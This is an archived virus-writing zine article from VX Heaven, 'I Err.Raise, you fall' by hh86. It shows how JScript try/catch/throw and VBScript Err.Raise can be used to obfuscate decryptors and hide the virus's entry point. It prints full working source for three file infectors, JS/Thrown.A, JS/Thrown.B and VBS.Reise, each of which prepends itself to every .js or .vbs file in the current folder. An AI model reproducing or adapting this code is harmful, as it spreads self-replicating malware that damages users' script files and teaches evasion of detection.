Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

I Err.Raise, you fall

hh86
Valhalla #1
August 2011

1
[Back to index] [Comments]

Exceptions

Try and Catch are the most widely used statements for exception handlers in most languages. When we run code that might be vulnerable to unexpected exceptions we can run it in Try block. If an exception occurs, then the Catch block handles the problem. This mechanism also includes a statement to cause an exception. It is the Throw statement. The Throw statement can specify an exception info to be supplied to the Catch (it should decide then on handling it or not).

Throw it

My idea for an engine is to create a decryptor to build the virus body piece by piece using Try, Catch and Throw. In Try block we raise an exception, in Catch we rebuild, it would be like this:

        a=""
        try
        {
                throw "f = new Activ"
        }
        catch(e) {a += e}
        try
        {
                throw "eXObject("
        }
        catch(y) {a += y}

        //now run the code
 

I have created an engine, it is so simple, but the result is very good.

Here is JS/Thrown.A:

//hh86
h()
function h()
{
        //JS/Thrown.A
        f=new ActiveXObject("Scripting.FileSystemObject")
        q = rn()
        k = q+"=[];"
        l = "" + h
        for(i=0;i<l.length;i++)
        {
                c = l.substr(i,1).charCodeAt(0).toString(16)
                if(c=="a" || c=="d"){c ="0"+c}
                y = rn()
                k = k + "try{throw\"\\x" + c + "\"}catch(" + y + ")" +
                        "{" + q + ".push(" + y + ")};"
        }

        k = k + ";" + q + "=" + q + ".join(\"\");eval(\"h();\"+" + q + ");"
        for(y=new Enumerator(f.getfolder(".").files);!y.atEnd();y.moveNext())
        {
                x=y.item();
                if(f.GetExtensionName(x).toLowerCase()=="js")
                {
                        try
                        {
                                b=f.OpenTextFile(x);h=b.ReadAll();b.Close();
                                if(h.substr(0,6)!="//hh86")
                                {
                                        p=x.Attributes;
                                        x.Attributes=0;
                                        l=f.CreateTextFile(x);
                                        l.Write(k+h);l.Close();
                                        x.Attributes=p
                                }
                        }
                        catch(e)
                        {}
                }
        }
        function rn()
        {
                return "r"+f.GetTempName().substr(3,5)
        }
}
 

EPO

We will use the function constructor like this:

        try
        {
                throw function(){WScript.Echo("Oh! Hello :)")}
        }
        catch(e) {e()}
 

Awesome!

An obvious extension to that code is not calling the virus body whithin Catch block, sample 1. However, Catch is executed when function returns. So, what if we want to decrypt something in function and build in Catch? Then we use return, sample 2. Yet we have another trick, we do not clearly specify we have function to be executed (without "()"), in this case we need to run in Catch, sample 3.

Sample 1:

        try
        {
                throw g()
        }
        catch(e) {}
        function g() {...}
 

Sample 2:

        a=""
        try
        {
                throw g()
        }
        catch(e) {a += e}
        ...
        function g() {return "f = new Activ"}
 

Sample 3:

        try
        {
                throw g
        }
        catch(e) {e()}
        function g() {...}
 

And then we can use sample 2, but returning a function:

        try
        {
                throw g();
        }
        catch(e){e()}
        function g()
        {
                return function(){WScript.Echo("Oh, Hello again and again!")}
        }
 

Throw can be used in so many ways in such a functional language as is JScript. Here is JS/Thrown.B:

//hh86
try{throw function t()
{
        /*JS/Thrown by hh86*/
        f=new ActiveXObject("Scripting.FileSystemObject");
        for(y=new Enumerator(f.getfolder(".").files);!y.atEnd();y.moveNext())
        {
                x=y.item();
                if(f.GetExtensionName(x).toLowerCase()=="js")
                {
                        try
                        {
                                b=f.OpenTextFile(x);h=b.ReadAll();b.Close();
                                if(h.substr(0,6)!="//hh86")
                                {
                                        p=x.Attributes;x.Attributes=0;
                                        l=f.CreateTextFile(x);
                                        l.Write("//hh86\rtry{throw "+t+
                                        "}catch(e){e()}"+"\r"+h);l.Close();
                                        x.Attributes=p
                                }
                        }
                        catch(e)
                        {}
                }
        }
}
}
catch(e){e()}
 

VBScript

VBScript has no Try, Catch and Throw statement. Instead we have 'On Error Resume Next' and 'On Error GoTo 0'. The first one is so obvious, the latter goes by default, no exception handling is used. Method Raise from Err object can cause an exception on purpose. It has some arguments: Number (long), Source (string), Description (string), HelpFile (string), HelpContext (string). Since the latter On Error does not support GoTo Label, we cannot specify a routine to handle err. On Resume Next, when an exception happens the IP is moved to next and continues execution, unpredictableness happens next. If we adjust the JScript idea then we can do the next:

        on error resume next            'must specify
        err.raise asc("s")              'cause exception, send char code
        v = v & chr(err)                'get and concatenate
        err.raise asc("e")
        v = v & chr(err)
        err.raise asc("t")
        v = v & chr(err)
 

We send every character code of the source as exception number. We concatenate the character and so it continues. I do not use 'Err.Number' because Err itself returns the exception number, for optimisation sake. You can send code in any form you want, as string, or number, etcetera.

EPO

Good news is, I finally found how to use it to call a routine. So simple. Instead of Number or description or help of any kind, we will pass the name of a function (not a Sub, not a Label. Function). The function will be automatically executed before the IP is moved to next line. So, we hook the execution there. VB6 behaves the same with this. Here goes the code, very simple.

        on error resume next
        err.raise v                     'au revoir ()
        ...                             'host code

        function v()
        ...                             'virus code
        end function
 

Great, isn't it? ;)

Here is VBS.Reise:

:on error resume next
'VBS.reise by halloweeney
set f=createobject("scripting.filesystemobject")
u=left(f.gettempname,8)
v="function "+u+"()"+":"+f.opentextfile(wscript.scriptfullname).readall+":end function"
set o=f.getfolder(".")
for each x in o.files
        if lcase(f.getextensionname(x))="vbs"then
                a=x.attributes
                x.attributes=0
                g=f.opentextfile(x).readall
                if err=0then
                        if left(g,1)<>":"then
                                set s=f.createtextfile(x)
                                s.write(":on error resume next:err.raise "+
                                        u+vbcrlf+g+vbcrlf+v)
                                s.close
                        end if
                end if
                x.attributes=a
        end if
next
 
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxer.org aka vx.netlux.org
deenesitfrplruua